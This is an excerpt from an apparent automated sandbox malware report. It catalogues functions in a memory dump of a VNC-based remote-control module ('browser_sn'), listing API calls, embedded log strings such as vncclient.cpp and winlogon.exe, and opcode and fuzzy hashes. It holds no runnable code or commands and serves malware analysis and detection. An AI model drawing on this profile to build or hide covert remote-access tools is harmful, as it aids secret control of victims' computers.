                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$CloseInputOpen
                                                      • String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 1367241101-2270697846
                                                      • Opcode ID: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
                                                      • Instruction ID: 681820678fc7fe2cd98ae7d90d14f3851576eaa79dc822aaaaedefb5184c343e
                                                      • Opcode Fuzzy Hash: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
                                                      • Instruction Fuzzy Hash: A8D19F26A2C6D185E760EB35C4587FEABA1EF86B88F954131CA4C477A5CF38F485C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
                                                      • String ID: <unavailable>$Default
                                                      • API String ID: 424836046-797050109
                                                      • Opcode ID: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
                                                      • Instruction ID: 8a64729962e2292054b21c723444509650554044141103ae7e6b7317a7d08295
                                                      • Opcode Fuzzy Hash: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
                                                      • Instruction Fuzzy Hash: 72616022A18A4681EB70AB35D4942BDB3A5FF85F85F844135DE0E477A5DF3CE946C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                      • API String ID: 145871493-4162899161
                                                      • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                      • Instruction ID: 8b7af18ad0a010debc337181dcdc9a5a6e8ede2044fd0b09a47c61f27f88f126
                                                      • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                      • Instruction Fuzzy Hash: 0C418D32629B4286E664AF35E8402A9B2B5FF86BA0F945235DD9D03754EF38F445C310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                      • API String ID: 145871493-4083478734
                                                      • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                      • Instruction ID: fa3ea3a53848666ebca85e70a1a118d962b653d4c9ba47771535bd37dde5be83
                                                      • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                      • Instruction Fuzzy Hash: 98416E32A29B4285EA74EF35E8402EAF2A5FF85750FD90135D99D43794DF38F494C620
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
                                                      • String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
                                                      • API String ID: 2822070703-2230024269
                                                      • Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                      • Instruction ID: be8d26162e91d4034e03bf6b30799791419c4adbc29c4dbc0215fe2bad0806d6
                                                      • Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                      • Instruction Fuzzy Hash: C9414425628B8181EB74EB35E8542A9E7A0FF89791FD05235DA5D43B94EF3CF504CB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
                                                      • String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                      • API String ID: 82840795-1493190668
                                                      • Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                      • Instruction ID: b3f3584c902c268008b85438822ff12e7d8428b585e050d8687202eff0d3bc06
                                                      • Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                      • Instruction Fuzzy Hash: D1217364F38A4380FB75BB36B9401F5E361AF95744FC86031D91E46355EE3CF55182A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
                                                      • String ID: VncEvent
                                                      • API String ID: 2428488660-2681191898
                                                      • Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                      • Instruction ID: 80af6395a2416f3c8cfbcf25bba525606514cfb64d2d0710a80b974620f4150f
                                                      • Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                      • Instruction Fuzzy Hash: 42114214F2CA4342FB74AB31A9543BAE2F1BF8AB85F986034C90E56794DE2CF4458720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                      • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                      • API String ID: 3015439405-2946900448
                                                      • Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                      • Instruction ID: af9f68bf48088355ffde2ce00e72d8170b8c10f9a72b9dddc159c800c407537c
                                                      • Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                      • Instruction Fuzzy Hash: 80211A76924B8281DB10EF34E8941A8B3B4FB55B08F94A035CE5D17364EF3CE559C360
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 101574016-0
                                                      • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                      • Instruction ID: 26a368625e220433a703d11b43d6d78ad2049c082612259dd96a672941b9ed9c
                                                      • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                      • Instruction Fuzzy Hash: 67A10F61E2974249FA30BB31A9222B9EA96AF42B94FC48534DF1D477C5DF3CF4418322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
                                                      • String ID:
                                                      • API String ID: 2697342021-0
                                                      • Opcode ID: 922aba798d6da5cdc0d9f7ea4c2bad0652777394967dab14ec6927544dc35b0e
                                                      • Instruction ID: 9771dbedd5a483a125201826473d844b893f23d75cf4e117da5adfd5e92cb3b8
                                                      • Opcode Fuzzy Hash: 922aba798d6da5cdc0d9f7ea4c2bad0652777394967dab14ec6927544dc35b0e
                                                      • Instruction Fuzzy Hash: 37818F26A28A8194EB20EF7094543FC67A1FF85BA8F840235DE2D1B7D5CF38E549C324
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                      • String ID:
                                                      • API String ID: 3219262609-0
                                                      • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                      • Instruction ID: 61cdb901e1ea66072469d80ffa65bc0e384efa644420c23998b3a449b9b89d83
                                                      • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                      • Instruction Fuzzy Hash: C431B452E2C60289FA717B715A223F9E190AF43BD0FD84431EB5E577C6DE2CF8059222
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                      • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                      • API String ID: 173432231-678763868
                                                      • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                      • Instruction ID: 596df914a59d52822585e53ec32e58acc9d5ce5ad0e0ef8d7b62012d8915ed20
                                                      • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                      • Instruction Fuzzy Hash: 1841E832629B81A6E658EF34E9402E9B3B8FB85754F905135D6AD037A0DFB8F4B5C310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                      • API String ID: 3677997916-356703426
                                                      • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                      • Instruction ID: d5ce1880080bc17b4df61f31de471f5a181057efdd8d6b603e55390c622bf9aa
                                                      • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                      • Instruction Fuzzy Hash: 3A412C32A3864382EB74AB30E4453EAF6A0FF45B48F845131EA4D86759EF2CE515DB24
                                                      APIs
                                                      Strings
                                                      • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF790C6321D
                                                      • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF790C6319A
                                                      • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF790C63246
                                                      • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF790C631DE
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
